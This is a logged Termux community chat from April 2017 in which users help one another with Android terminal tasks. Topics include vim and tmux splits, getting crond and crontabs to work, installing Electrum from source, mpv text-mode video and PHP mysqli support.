Logged intermittently from freenode.
Topic for #termux is termux.com | This channel is mirrored | Terminal emulator and Linux environment for Android
Topic set by fornwall (~u0_a110@23.229.0.146) on Wed, 07 Sep 2016 17:05:29
Channel #termux:
Channel created on Fri, 04 Sep 2015 18:19:05
2017-04-22 12:47:23 gitter1 (mklein994) Has anyone tried installing CPAN modules on Termux? I want to try building biber
for TeXLive, and it requires some modules.
2017-04-22 12:47:37 gitter1 (mklein994) I’m just wondering if it’s worth the headache.
2017-04-22 12:48:35 gitter1 (mklein994) The biber.armel-linux
package is not built for Termux, so I can’t use it directly.
2017-04-22 12:49:22 gitter1 (sdrausty) @mklein994 tried failed
2017-04-22 12:49:54 gitter1 (mklein994) The CPAN thing?
2017-04-22 12:51:52 gitter1 (sdrausty) @mklein994 from source http://biblatex-biber.sourceforge.net
2017-04-22 12:59:13 gitter1 (sdrausty) It will be tremendous when biber, makeindex, xelatex and others work:)
2017-04-22 13:01:24 gitter1 (mklein994) xelatex works. tlmgr install collection-xetex && texlinks
. Then xelatex --help
should do something.
2017-04-22 18:42:51 gitter1 (cocodevienne) termux-create-package
is exactly what I meant when I said on-device
.
2017-04-22 18:42:59 gitter1 (cocodevienne) @sdrausty
2017-04-22 18:43:27 gitter1 (cocodevienne) And btw, how do I get the split-screen between Vim and the Shell?
2017-04-22 18:43:36 gitter1 (cocodevienne) @vishalbiswas
2017-04-22 18:53:16 gitter1 (mklein994) @cocodevienne I’m not @vishalbiswas
, but you could use Neovim (:help terminal
) or tmux
.
2017-04-22 19:42:56 gitter1 (cocodevienne) But how do I split it?
2017-04-22 19:44:58 gitter1 (mklein994) :split
.
2017-04-22 19:45:09 gitter1 (mklein994) (In nvim/vim).
2017-04-22 19:46:35 gitter1 (cocodevienne) Many thanks amigo!
2017-04-22 19:46:40 gitter1 (cocodevienne) @mklein994
2017-04-22 19:47:20 gitter1 (mklein994) No problem. Remember to check out :help
every now and then. I find :helpgrep
to be very useful.
2017-04-22 19:55:28 gitter1 (cocodevienne) Thanks!!:)
2017-04-23 00:18:51 kikiji buffer 1
2017-04-23 07:24:16 van777 ls
2017-04-23 07:24:33 van777 wrong window ))
2017-04-23 07:46:04 Strife89 Hmmm, I noticed that mpv is available in the Termux repositories. But I’m confused as to why it’s there; can you play videos with it despite having no X.org server (or equivalent)? If not, what (else) would one do with it in Termux?
2017-04-23 07:52:29 live_the_dream there are no console music apps that use opensl on android
2017-04-23 07:52:53 live_the_dream there is also a text video output
2017-04-23 07:54:31 live_the_dream so without a lot of choice its either mpv or….
2017-04-23 07:56:34 van777 Strife89: i listen to online radio with mpv in termux
2017-04-23 08:21:30 frumpylava Strife89: Combined with beets.io, mpv is actually a pretty cool music player. I also made notification controls for it. https://github.com/Neo-Oli/Termux-Mpv
2017-04-23 08:22:03 frumpylava it has completely replaced. poweramp on my phone
2017-04-23 08:22:33 frumpylava I also use it as a podcast playee using the ‘greg’ podcatcher.
2017-04-23 10:06:20 Strife89 Ahhhh.
2017-04-23 10:06:50 Strife89 I’ll try that out, frumpylava!
2017-04-23 11:14:54 sdrausty @fornwall Can you please fix the gitter/irc bot. It seems to have crashed.
2017-04-23 18:33:45 jacob___ hi guys! is there a command to force quit an app using termux?
2017-04-24 06:37:01 gitter1 (vishalbiswas) @rekt03486009_twitter Why do you need to?
2017-04-24 10:53:53 gitter1 (rekt03486009_twitter) i could not make myself clear, i meant; could i compile .c .h .cpp files on termux into .so files and use them in android apps. i’m really bad at terminology of these things
2017-04-24 12:05:16 gitter1 (vishalbiswas) @rekt03486009_twitter Yes, but only for your own arch
2017-04-24 12:05:39 gitter1 (vishalbiswas) We don’t have cross compilers
2017-04-24 12:12:47 sdrausty We do have clang (gcc && g++)
2017-04-24 12:26:42 gitter1 (vishalbiswas) But they’ll only compile for the arch they are running on. Whereas, ndk will compile for all requested arches that the app is designed to run on
2017-04-24 12:49:52 gitter1 (sdrausty) I got a ~600 page book 📖 built into PDF on device:) WOW https://github.com/sdrausty/book
2017-04-24 12:52:00 gitter1 (mklein994) Nice. It’s incredible to know what you can do with just a phone.
2017-04-24 13:13:03 gitter1 (sdrausty) I could not get it to build from the Makefile which gets stuck at
2017-04-24 13:14:28 gitter1 (sdrausty) sh: 1: makeindex: not found
2017-04-24 16:19:41 u0_a195 yo
2017-04-24 16:20:59 u0_a195 I have a request
2017-04-24 16:21:32 u0_a195 can we get nikto to termux. I’d love to have it on the go
2017-04-24 16:24:24 lol ded
2017-04-24 16:36:20 gitter1 (sdrausty) @mklein994 Thanks for “tlmgr install collection-xetex && texlinks
. Then xelatex --help
” It does work. I don’t understand why it didn’t work after running 🏃 tlmgr install scheme-full
.
2017-04-24 17:59:37 gitter1 (cocodevienne) Uhm, I tried the :split
command. Could someone tell me how I get the terminal on top, and the vim Window below the terminal window?
2017-04-24 17:59:46 gitter1 (cocodevienne) All insdie termux?
2017-04-24 18:54:14 gitter1 (mklein994) @cocodevienne honestly, have a go at vimtutor
and :help
(inside vim). It’s great to go through vim basics. There’s a lot to learn; I go through it every now and then just to make sure I’m not forgetting anything.
2017-04-24 19:04:18 gitter1 (cocodevienne) Ok thanks @mklein994
2017-04-24 22:46:05 gitter1 (vishalbiswas) frumpylava: electrum is working. You just needed to create a new wallet.
2017-04-24 22:47:57 gitter1 (vishalbiswas) Or import an existing one
2017-04-24 23:48:51 gitter1 (bitcoinmeetups) Cool
2017-04-24 23:48:57 gitter1 (bitcoinmeetups) Anyway
2017-04-24 23:49:11 gitter1 (bitcoinmeetups) Hoe can I start crond on Termux? And what folder should I put the crontab in?
2017-04-24 23:49:16 gitter1 (bitcoinmeetups) How
2017-04-25 00:11:34 sdrausty crontab -e
2017-04-25 00:16:23 gitter1 (bitcoinmeetups) That does not answer my question. I want to know how to start crond and where to put the crontab. I know how to edit it already.
2017-04-25 00:17:00 gitter1 (bitcoinmeetups) @vishalbiswas What command did you use to install electrum?
2017-04-25 00:17:16 gitter1 (vishalbiswas) manually installed it from source repo
2017-04-25 00:17:40 gitter1 (bitcoinmeetups) You took the tar.gz or something and put it in a folder and used dkpg?
2017-04-25 00:18:56 gitter1 (vishalbiswas) na, cloned the repo, installed dependencies, modified a little to disable android platform detection
2017-04-25 00:24:31 gitter1 (bitcoinmeetups) Ah, yes. Trying now.
2017-04-25 00:24:53 gitter1 (bitcoinmeetups) Oh, you modified a little. Maybe this will not work then.
2017-04-25 00:25:00 gitter1 (bitcoinmeetups) I am cloning now
2017-04-25 00:31:17 gitter1 (vishalbiswas) @bitcoinmeetups apply this patch
2017-04-25 00:31:17 gitter1 (vishalbiswas) ```patch
2017-04-25 00:31:17 gitter1 (vishalbiswas) diff –git a/electrum b/electrum
2017-04-25 00:31:17 gitter1 (vishalbiswas) [full message: https://gitter.im/termux/termux?at=58fed115c1d3b50154194ae5]
2017-04-25 00:32:21 gitter1 (vishalbiswas) just ran termux-fix-shebang and s | ‘ANDROID_DATA’ in os.environ | False |
2017-04-25 00:36:15 frumpylava @vis
2017-04-25 00:37:10 frumpylava @vishalbiswas cool. I’ll try that out later today.
2017-04-25 02:41:33 live_the_dream hmm someone asked for alpine 2.21 …
2017-04-25 02:41:36 live_the_dream yeah nuh
2017-04-25 02:41:58 live_the_dream if i remmeber correctly i was kind of drunk a bit when i got it working
2017-04-25 02:54:51 frumpylava @vishalbiswas, yes I got electrum to work. Altough the text mode seems to suffer from considerable code rot.
2017-04-25 02:56:51 gitter1 (vishalbiswas) Exactly!
2017-04-25 02:58:30 frumpylava But I think the main things work.
2017-04-25 02:59:31 frumpylava I found this issue about it https://github.com/spesmilo/electrum/issues/2354
2017-04-25 03:46:10 gitter1 (cocodevienne) https://plus.google.com/109751175275030326346/posts/8gYVmwbjYnp
2017-04-25 03:46:24 gitter1 (cocodevienne) 1) Have I handled this well?
2017-04-25 03:46:34 gitter1 (cocodevienne) 2) What does “s hall” mean?
2017-04-25 04:00:44 gitter1 (vishalbiswas) he got confused with using github repo push/pull and repo access
2017-04-25 04:01:11 gitter1 (vishalbiswas) he thought that users will need to use git clone to get deb files
2017-04-25 04:01:52 gitter1 (vishalbiswas) so thats why he was asking, “should the repo be private or public?” as in actual repo read access on github
2017-04-25 04:14:20 gitter1 (cocodevienne) Ohh, thanks lol, I got so confused.
2017-04-25 04:14:25 gitter1 (cocodevienne) @vishalbiswas
2017-04-25 07:23:29 gitter1 (cocodevienne) I’m very confused about splitting vim and the shell in side of Tmux. Can someone walk moi through all the steps?
2017-04-25 08:03:44 frumpylava @cocodevienne Well, you can do 2 things. Split tmux (ctrl+b+”) and launch another instance of vim (this means you can’t easily yank and paste betweet the splits) or you can split vim itself (:split). I avoid launching several instances of vim as much as possible and instead split vim itself.
2017-04-25 08:05:05 gitter1 (cocodevienne) How do I do “ctrl”?
2017-04-25 08:05:11 gitter1 (cocodevienne) Volume up?
2017-04-25 08:05:42 frumpylava Either that or you enable the extra keys view.
2017-04-25 08:06:20 frumpylava https://termux.com/touch-keyboard.html#extra-keys-view
2017-04-25 08:06:33 frumpylava @cocodevienne for using tmux, I strongly suggiest you enable mouse mode (put set-option -g mouse on
in ~/.tmux.conf). It makes working with tmux much easier when not yet knowing all the keyboard shortcuts.
2017-04-25 08:09:41 frumpylava @cocodevienne To learn about the keybindings see https://tmuxcheatsheet.com
2017-04-25 08:10:18 gitter1 (cocodevienne) works now!:)
2017-04-25 08:10:26 gitter1 (cocodevienne) it’s volume down loool
2017-04-25 11:06:53 gitter1 (cocodevienne) Why isn’t this working?
2017-04-25 11:06:56 gitter1 (cocodevienne) https://pastebin.com/9ix8T3Kn
2017-04-25 11:07:13 gitter1 (cocodevienne) Can’t I declare a string function?
2017-04-25 11:56:09 gitter1 (vishalbiswas) Error?
2017-04-25 12:31:33 termuxy hi
2017-04-25 12:32:05 termuxy does mpv on termux play video or just audio
2017-04-25 12:32:41 termuxy does it have a pseudo GUI like other unixes
2017-04-25 13:04:19 gitter1 (vishalbiswas) Yes it does, termuxy
2017-04-25 13:04:50 gitter1 (vishalbiswas) mpv -vo tct
is what you’re looking for
2017-04-25 13:05:34 gitter1 (vishalbiswas) Though, I prefer -vo caca
2017-04-25 13:07:41 gitter1 (mklein994) Yeah, on my phone (Galaxy S5) it stutters quite a bit, rendering it unusable with mpv -vo tct
(true color terminal).
2017-04-25 13:09:42 termuxy I want to use it with mpsyt as a default player
2017-04-25 13:10:40 termuxy but i cant play video. -the show_video option is on true-
2017-04-25 13:11:11 termuxy it anyone is familiar with mpsyt
2017-04-25 13:26:22 gitter1 (vishalbiswas) Set the player to mpv -vo caca
2017-04-25 13:26:35 gitter1 (vishalbiswas) instead of just mpv
2017-04-25 13:26:52 termuxy caca??
2017-04-25 13:27:00 gitter1 (vishalbiswas) libcaca
2017-04-25 13:27:08 gitter1 (vishalbiswas) Much faster than tct
2017-04-25 13:27:13 gitter1 (vishalbiswas) And fun
2017-04-25 13:28:20 termuxy so there is no ui like on linux for mpv??
2017-04-25 13:29:02 gitter1 (vishalbiswas) If you mean OpenGL ES output, then no
2017-04-25 13:29:50 gitter1 (vishalbiswas) I wonder if we can have vncservers in termux…
2017-04-25 13:31:21 termuxy why?
2017-04-25 13:33:20 termuxy no no vnc just checked
2017-04-25 13:33:49 gitter1 (vishalbiswas) Termux feels like an abstraction layer for linux programs, not a full distro
2017-04-25 13:34:16 gitter1 (vishalbiswas) Also, it would need a lot of work
2017-04-25 13:37:45 termuxy yep
2017-04-25 22:45:12 Spriing Nice
2017-04-25 23:08:50 gitter1 (vishalbiswas) @fornwall I can get Xvfb to compile. Does this mean that a vncserver is doable, theoritically?
2017-04-26 02:37:22 frumpylava I just realized that there actually were posts on the termux mailing lists. Even though I subscribed in february, I haven’t gotten a single email yet.
2017-04-26 03:04:22 gitter1 (vishalbiswas) Its working for me. I’ve received all these mails
2017-04-26 03:22:29 frumpylava @vishalbiswas I subscribed again now. Altough it does show me as having subscribed at Feb 9. I worte a post now, We’ll see if I receive the replies.
2017-04-26 03:25:53 frumpylava @vishalbiswas By the way, I did my first baby steps in bitcoin now. All in Termux. It barely works. I even went to a ticket machine at the trainstation and scanned the QR code and bought 14 mbtc.
2017-04-26 03:26:18 gitter1 (vishalbiswas) that qr is pretty neat, i like it
2017-04-26 03:26:48 gitter1 (vishalbiswas) makes me wonder what kinds of apps have a cli…
2017-04-26 03:49:43 frumpylava The electrum daemon is pretty neat as well.
2017-04-26 04:07:29 gitter1 (vishalbiswas) I wish there was a web frontend for it, instead of that curses based one
2017-04-26 04:16:09 live_the_dream hmm
2017-04-26 04:17:36 live_the_dream openal guy added capture to openal-soft
2017-04-26 04:17:58 live_the_dream unfortunately it doesn’t work he doesn’t have a device to test …
2017-04-26 04:18:28 live_the_dream ls
2017-04-26 04:18:58 live_the_dream it would be good … we could make audio phone calls via termux
2017-04-26 04:19:41 live_the_dream full circle?
2017-04-26 04:21:11 live_the_dream i know what you are thinking “communicating via audio via a mobile phone?” fantastic right?
2017-04-26 04:21:57 gitter1 (vishalbiswas) are there any cli voice comm apps?
2017-04-26 04:22:19 gitter1 (vishalbiswas) never even thought of trying to use one
2017-04-26 04:23:43 live_the_dream i got toxic working
2017-04-26 04:23:55 live_the_dream toxic is a tox client
2017-04-26 04:24:20 live_the_dream can do video as well …
2017-04-26 04:25:07 live_the_dream but only proper android one obviously
2017-04-26 04:59:13 gitter1 (cocodevienne) https://plus.google.com/109751175275030326346/posts/3eUy8hhEP1z
2017-04-26 04:59:57 gitter1 (cocodevienne) Any help for this issue. Thanks for the help, but I figured it out!:) Simple ifs will solve my problem!:) @mklein994
2017-04-26 05:00:07 gitter1 (cocodevienne) *?
2017-04-26 05:00:14 gitter1 (cocodevienne) @fornwall @vishalbiswas
2017-04-26 06:14:03 gitter1 (bitcoinmeetups) Hi there. How can I turn on crond in Termux? Input “crond” does not seem to work. Or “service crond start”. Any ideas?
2017-04-26 06:42:18 frumpylava @bitcoinmeetups if you run crond
it will daemonize and not produce any output, but run in the background. try crond -f
if you want to see it’s output
2017-04-26 06:44:40 gitter1 (bitcoinmeetups) @frumpylava Well, I have this test crontab in the home folder: * * * * * date > ~/date.txt I guess if crond were running the crontab should actually generate some output to the date.txt file every 1 minute but that doesn’t seem to be the case. Any ideas why?
2017-04-26 06:44:56 gitter1 (bitcoinmeetups) There are five stars * before date but gitter app removed them
2017-04-26 06:45:04 gitter1 (bitcoinmeetups) * * * * *
2017-04-26 06:45:53 frumpylava and crontab -l
shows that as well?
2017-04-26 06:46:30 gitter1 (bitcoinmeetups) @frumpylava crontab -l
2017-04-26 06:46:30 gitter1 (bitcoinmeetups) crontab: can’t open ‘u0_a203’: No such file or directory
2017-04-26 06:48:18 frumpylava so where did you write that cronjob to?
2017-04-26 06:50:20 gitter1 (bitcoinmeetups) That’s what I’m trying to figure out. What folder should it go to?
2017-04-26 06:51:43 frumpylava you can type “crontab -e” to edit the correct file
2017-04-26 06:52:51 frumpylava or you can load a file by running ‘crontab ~/yourfile’
2017-04-26 06:56:35 gitter1 (bitcoinmeetups) @frumpylava Okay I went down to the spools directory, picked the same file that crontab -e edits, added the line I posted above but there is still no output to ˜/date.txt
2017-04-26 06:58:57 gitter1 (bitcoinmeetups) I just noticed that crontab -e generates a new crontab every time
2017-04-26 07:03:28 frumpylava Yeah, I think crontab -e is slightly broken. Just edit the file manually.
2017-04-26 07:03:59 frumpylava Try killing all stray crond processes and starting a fresh one with crond -f
2017-04-26 07:14:17 gitter1 (bitcoinmeetups) @frumpylava Ok I tried killall crond and then crond -f. Still no output. The question is which crontab I should edit because all of them looks like crontab.23451, crontab.23445 and so on.
2017-04-26 07:15:49 frumpylava the one that starts with u0_*
2017-04-26 07:16:26 frumpylava https://github.com/termux/termux-packages/issues/590
2017-04-26 07:17:01 gitter1 (bitcoinmeetups) None of them starts with u0_. /data/data/com.termux/files/usr/var/spool/cron
2017-04-26 07:17:07 gitter1 (bitcoinmeetups) Checking out 590 now
2017-04-26 07:23:20 gitter1 (bitcoinmeetups) @frumpylava Okay I went down to the crontabs directory and manually edited a file with my user ID as name. It actually worked. Glad to see it working, because I have tried making crontabs a bunch of times and it never seems to work well. Thanks for the advice and happy coding : D
2017-04-26 07:37:17 frumpylava great \o/
2017-04-26 08:10:48 andi___ :qa
2017-04-26 08:52:55 enovella hi guys, why termux is not supported on Android 4.4.x?
2017-04-26 08:53:23 enovella I cannot run it on my old Xoom1 with CM13 Android 4.4 KitKat
2017-04-26 08:53:41 enovella complains about requirements are not met
2017-04-26 09:18:43 live_the_dream no 5.0 or above
2017-04-26 09:32:14 enovella could I ask why this limitation?
2017-04-26 09:32:23 enovella dalvik vs ART
2017-04-26 09:51:48 live_the_dream api 21 or later
2017-04-26 10:21:22 gitter1 (vishalbiswas) enovella: there are some quirks that are only available from 5.0+
2017-04-26 10:23:34 gitter1 (vishalbiswas) while pre API 21 could be done, a lot more work would be required to port packages, because of the bionic libc
2017-04-26 10:28:44 enovella gotcha and thx
2017-04-26 10:28:51 enovella a pity though
2017-04-26 12:35:40 frumpylava lol, my bank has an sms service that I can query my balance with. I wrote a script that automatically queries this every hour and displays my current balance in my tmux status bar. the termux-api is pretty great.
2017-04-26 12:38:44 gitter1 (mklein994) You need to see your bank balance every hour?
2017-04-26 12:40:01 frumpylava @mklein994 No, not really.
2017-04-26 12:40:54 gitter1 (mklein994) Still a neat POC.
2017-04-26 12:44:19 frumpylava Yeah, I did the same thing for my electrum wallet. and I thought, wouldn’t it be neat to have that for my fiat bank account as well
2017-04-26 16:48:01 gitter1 (cocodevienne) Danish Nayeem?
2017-04-26 16:48:05 gitter1 (cocodevienne) Where u at?
2017-04-26 17:57:19 Atomic_RVWuB hi
2017-04-26 18:02:35 gitter1 (cocodevienne) Hi yourself.
2017-04-26 18:14:11 gitter1 (cocodevienne) Danish?
2017-04-26 21:18:44 gitter1 (bitcoinmeetups) Good morning. So I want to start crond automatically at launch through .bashrc. Where is that file on Termux? I made a whereis search and found three different directories
2017-04-26 21:49:43 live_the_dream .bashrc needs to be created in your home dir so ~/.basrc
2017-04-26 21:49:53 live_the_dream err ~/bashrc
2017-04-26 22:23:57 rods-tab3 third times a charm ie ?? ~/.bashrc ??
2017-04-26 22:29:00 gitter1 (bitcoinmeetups) Wow, cool and easy : D
2017-04-26 22:29:29 gitter1 (bitcoinmeetups) Okay, maybe time to try to get Electrum running now
2017-04-26 22:29:43 gitter1 (bitcoinmeetups) @vishalbiswas Is it working for you?
2017-04-26 22:33:17 gitter1 (bitcoinmeetups) Or anyone else for that matter has Electrum up and running on Termux?
2017-04-26 22:50:32 gitter1 (vishalbiswas) @bitcoinmeetups frumpylava is using it. He also posted some really simple steps to install it in the termux issue
2017-04-26 22:51:44 gitter1 (bitcoinmeetups) I was looking there yesterday
2017-04-26 22:51:52 gitter1 (bitcoinmeetups) I will look again
2017-04-26 22:55:08 gitter1 (bitcoinmeetups) You mean this one? https://github.com/termux/termux-packages/issues/945
2017-04-26 22:55:15 gitter1 (bitcoinmeetups) Not sure if this is gonna work
2017-04-26 22:56:43 live_the_dream ~/ is always your home dir
2017-04-26 22:59:20 gitter1 (mklein994) If there’s anything I’d change in the instructions, it would be to use pip install --user
instead of just pip install
. This keeps manually installed pip packages separate from those installed with apt
. Just my 2¢.
2017-04-26 23:00:19 gitter1 (mklein994) But that changes the patch, so it might be simpler to just leave it.
2017-04-26 23:01:56 gitter1 (bitcoinmeetups) Who’s got the skills to package it : D?
2017-04-26 23:02:03 gitter1 (vishalbiswas) @mklein994 Thats why I wrote that I don’t know how to package python based packages ;)
2017-04-26 23:02:43 gitter1 (mklein994) I don’t either; I just know it gets complicated really fast.
2017-04-26 23:02:51 gitter1 (bitcoinmeetups) @fornwall Hello Fredrik, how are you? Is it possible to have Electrum packaged or referred to someone that can do it?
2017-04-26 23:03:11 gitter1 (vishalbiswas) Last time I really used python, it was before pip was even a dream in the devs eyes
2017-04-26 23:04:04 gitter1 (bitcoinmeetups) You must be a hundred years old then?
2017-04-26 23:04:46 gitter1 (bitcoinmeetups) Just kidding
2017-04-26 23:04:47 gitter1 (vishalbiswas) I learned python when Symbian S60 was the shit
2017-04-26 23:05:05 gitter1 (bitcoinmeetups) I see. Well at least you have learned it : D
2017-04-26 23:05:08 gitter1 (vishalbiswas) Python 1.something
2017-04-26 23:08:09 gitter1 (vishalbiswas) I’m in a similar situation with metasploit. It’s ruby-based
2017-04-26 23:08:39 gitter1 (vishalbiswas) I know how to install it manually, but, not how to package it
2017-04-26 23:58:48 gitter1 (bitcoinmeetups) I see. Maybe I will try to follow your instructions some day.
2017-04-27 00:10:09 rods-tab3 this was mentioned on google news feed https://play.google.com/store/apps/details?id=ohi.andre.consolelauncher
2017-04-27 18:19:41 live_the_dream what is the situation with openssl 1.1?
2017-04-27 20:00:08 gitter1 (DNTech) Hey.. php doesn’t have the libraries for mysql??
2017-04-27 20:01:48 gitter1 (DNTech) all functions & methods ouputs error: call to undefined function mysqli_connect()
2017-04-27 21:39:13 gitter1 (bitcoinmeetups) Good morning. Is it possible to turn on the USB tethering through the Termux-API?
2017-04-28 00:36:12 gitter1 (bitcoinmeetups) Also, I made a simple date script and put it in a crontab. For some reason everything is repeated a bunch of times (see below). Any idea why?
2017-04-28 00:36:13 gitter1 (bitcoinmeetups) ri Apr 28 11:32:00 ICT 2017
2017-04-28 00:36:13 gitter1 (bitcoinmeetups) Fri Apr 28 11:32:00 ICT 2017
2017-04-28 00:36:14 gitter1 (bitcoinmeetups) Fri Apr 28 11:32:00 ICT 2017
2017-04-28 00:36:14 gitter1 (bitcoinmeetups) [full message: https://gitter.im/termux/termux?at=5902c6becfec919272817b58]
2017-04-28 03:48:53 frumpylava @DNTech Yeah, Here’s and issue to track. https://github.com/termux/termux-packages/issues/938. mariadb was only added relatively recently, and nobody has yet enabled the mysqli extension for php.
2017-04-28 03:50:05 frumpylava @bitcoinmeetups: I think you have launched ‘crond’ multiple times.
2017-04-28 04:30:58 frumpylava @bitcoinmeetups If you’re serious about running services on Termux, I’ve set up an example repository in how I do it. https://github.com/Neo-Oli/termux-services. It will ensure that your services are started automatically and are only running once.
2017-04-28 04:38:52 gitter1 (vishalbiswas) frumpylava: looks like you just made postgresql, mariadb, php-fpm and transmission easier for me
2017-04-28 04:42:03 frumpylava @vishalbiswas I have services for those 4 as well, if you need them.
2017-04-28 04:42:22 gitter1 (vishalbiswas) sure
2017-04-28 04:42:59 gitter1 (vishalbiswas) you know, this could work as a termux package. we don’t have anything like this in the repo
2017-04-28 04:43:30 gitter1 (vishalbiswas) maybe it needs enable/disable and auto start features
2017-04-28 04:44:05 frumpylava BrainDamage was working on this a while ago, but he probably gave up.
2017-04-28 04:51:35 frumpylava @vishalbiswas I added the services now. They’re a bit more complicated though, since they specify config files. You may need to change them according to your file locations.
2017-04-28 04:53:04 gitter1 (vishalbiswas) Is there any daemon that you don’t have a service for?
2017-04-28 04:53:37 frumpylava @vishalbiswas tmux, but not for lack of trying.
2017-04-28 04:54:00 gitter1 (vishalbiswas) tmux is considered a daemon?
2017-04-28 04:54:28 frumpylava Well the server is.
2017-04-28 04:55:18 gitter1 (vishalbiswas) i think, i just embarrassed myself
2017-04-28 04:55:50 frumpylava I even frankensteined services for gpg-agent and dirmngr. They’re hacky, because there isn’t really a way to launch them non-daemonized.
2017-04-28 04:56:16 gitter1 (vishalbiswas) speaking of, ssh-agent works?
2017-04-28 04:57:43 frumpylava I haven’t tried ssh-agent. I generated an SSH Key as a subkey of my PGP Key and use gpg-agent as a replacement for ssh-agent.
2017-04-28 04:58:49 frumpylava It should work with the -D option.
2017-04-28 04:58:56 gitter1 (vishalbiswas) that’s the proper linuxy of hacking things
2017-04-28 05:09:25 frumpylava the sv controls are really great. Restarting the webserver or php-fpm process after a config update is now just a sv restart nginx
away.
2017-04-28 05:16:53 BrainDamage frumpylava: more than gave up I got sidetracked by rl stuff, I’m short of time for personal projects, the conclusion I’ve got to package the scripts in the distro without making a ugly mess was to create a svscriptsdir/service/run separated from the actual $SVDIR, then symlink them by the package manager itself inside SVDIR along a disabled file, this way a script can be provided for each service without risking to autostart unconfigured
2017-04-28 05:16:53 BrainDamage daemons, then all the user has to do to activate one is to just delete the disabled file and runsvdir will pick it up, my stopgap wasn’t technical problems rather having time to figure out how apt packages work, all the recipes stuff feel a bit confusing
2017-04-28 05:19:54 BrainDamage symlinking the individual files also has the advantage of not having the runtime files polluting the system package dir, damn having runsv writing runtime files in the config dir is such an annoying choice
2017-04-28 05:21:23 BrainDamage and using disabled file in place of creating/deleting the symlink is a cleaner solution because the user can just ls its svdir to list for all the service and doesn’t need an external tool to manage the start
2017-04-28 05:22:03 BrainDamage and an alias/function could be created as shorthand for rm/touch the disable file
2017-04-28 05:22:52 frumpylava sorry about that then. this “disabled” file sounds very much like the “down” file that runsv already knows about.
2017-04-28 05:24:03 BrainDamage yes, I forgot the exact name, I’d have to check the docs, but it sounds like the correct name
2017-04-28 06:10:42 gitter1 (bitcoinmeetups) @frumpylava The command that runs directly in the crontab gets repeated about ten times or so. The command which is run indirectly in a .sh file which is called from the crontab seems to give the correct result.
2017-04-28 06:12:51 frumpylava @bitcoinmeetups try running pgrep crond
. If it returns more than 1 number you have crond running multiple times, each running the cronjob every minute.
2017-04-28 06:14:22 gitter1 (bitcoinmeetups) Output: 15785. Also I have restarted Termux and the issue remains.
2017-04-28 06:14:42 frumpylava what does crontab -l
output?
2017-04-28 06:15:42 gitter1 (bitcoinmeetups) 10 * * * * date » ~/date.txt
2017-04-28 06:15:43 gitter1 (bitcoinmeetups)
2017-04-28 06:15:43 gitter1 (bitcoinmeetups) * * * * * ~/test.sh
2017-04-28 06:15:43 gitter1 (bitcoinmeetups) [full message: https://gitter.im/termux/termux?at=5903164f12d2409935a84f45]
2017-04-28 06:15:56 gitter1 (bitcoinmeetups) Formatting issue
2017-04-28 06:15:58 gitter1 (bitcoinmeetups) 1st line
2017-04-28 06:16:11 gitter1 (bitcoinmeetups) 10 star star star star date » ˜/date.txt
2017-04-28 06:16:14 gitter1 (bitcoinmeetups) 2nd line
2017-04-28 06:16:26 gitter1 (bitcoinmeetups) Star star star star star ˜/test.sh
2017-04-28 06:16:36 gitter1 (bitcoinmeetups) Third line ignore
2017-04-28 06:16:49 gitter1 (bitcoinmeetups) 1st line creates multiple output to date.txt
2017-04-28 06:16:52 gitter1 (bitcoinmeetups) 2nd line works
2017-04-28 06:17:15 gitter1 (bitcoinmeetups) Actually I’m pretty happy that at least the script works at the moment, so perhaps I should not focus on this at the moment
2017-04-28 06:18:42 frumpylava so the first line should launch every hour at :10, right?
2017-04-28 06:18:54 frumpylava The second line every minute.
2017-04-28 06:18:58 gitter1 (bitcoinmeetups) Yes
2017-04-28 06:19:29 gitter1 (bitcoinmeetups) But the output from first line is repeated about a ten times to date.txt
2017-04-28 06:19:38 gitter1 (bitcoinmeetups) Have not seen that one before, might be a Termux issue
2017-04-28 06:24:16 frumpylava hmm for me the same works.
2017-04-28 06:25:30 frumpylava What is the current content of you date.txt?
2017-04-28 06:26:26 frumpylava because the content you sent earlier indicates that it runs 10 times every minute. Is that still the case or have you changed the crontab line since.
2017-04-28 06:26:43 gitter1 (bitcoinmeetups) Looks a bit like this:
2017-04-28 06:26:43 gitter1 (bitcoinmeetups) ri Apr 28 15:10:03 ICT 2017
2017-04-28 06:26:44 gitter1 (bitcoinmeetups) Fri Apr 28 17:10:00 CST 2017
2017-04-28 06:26:44 gitter1 (bitcoinmeetups) Fri Apr 28 17:10:00 CST 2017
2017-04-28 06:26:44 gitter1 (bitcoinmeetups) [full message: https://gitter.im/termux/termux?at=590318e4f22385553d855abb]
2017-04-28 06:27:31 gitter1 (bitcoinmeetups) I think that number is a coincidence. As far as I know cron cannot run more often than once a minute without hackery.
2017-04-28 06:28:27 gitter1 (bitcoinmeetups) I’ve had some previous issues with my phone changing the date and time every time I restart it, not persistent time. Maybe could be related, maybe not.
2017-04-28 06:31:01 frumpylava It’s very weird.
2017-04-28 06:34:48 gitter1 (bitcoinmeetups) Well… I’d say it’s slightly weird. Maybe we can forget about it for now because at least the script works, which is more important.
2017-04-28 06:35:12 gitter1 (bitcoinmeetups) Anyway, do you know if I can enable/disable USB tethering in Termux or Termux-API?
2017-04-28 06:35:57 frumpylava No, I don’t know. Sorry.
2017-04-28 06:39:59 gitter1 (bitcoinmeetups) Answering my own question. I just read the docs at https://termux.com/add-on-api.html
2017-04-28 06:40:17 gitter1 (bitcoinmeetups) There is no info about the USB tethering so I am guessing it is not a possibility from Termux at the moment
2017-04-28 08:20:36 live_the_dream i was bored today so i did something
2017-04-28 08:23:35 live_the_dream ledger build ../
2017-04-28 08:26:04 live_the_dream so i got boost … kind of working a bit
2017-04-28 09:05:17 gitter1 (vishalbiswas) Boost without python for me
2017-04-28 09:07:51 live_the_dream yeah its not a huge deal since i only got it just to just satisfy ledger
2017-04-28 09:11:14 live_the_dream until we move to libc++
2017-04-28 09:26:12 gitter1 (cocodevienne) How do I fix this?
2017-04-28 09:26:19 gitter1 (cocodevienne) `Hit:1 http://termux.net stable InRelease
2017-04-28 09:26:19 gitter1 (cocodevienne) Ign:2 http://cocodevienne.gitlab.io/termux termux InRelease Get:3 http://cocodevienne.gitlab.io/termux termux Release [333 B]
2017-04-28 09:26:19 gitter1 (cocodevienne) Ign:4 http://cocodevienne.gitlab.io/termux termux Release.gpg
2017-04-28 09:26:19 gitter1 (cocodevienne) [full message: https://gitter.im/termux/termux?at=590342fb881b89e1019500ae]
2017-04-28 10:38:39 u0_a306 quit
2017-04-28 10:38:42 u0_a306 exit
2017-04-28 10:38:59 u0_a306 bye
2017-04-28 11:04:58 phil42 .
2017-04-28 11:07:01 u0_a97 ..
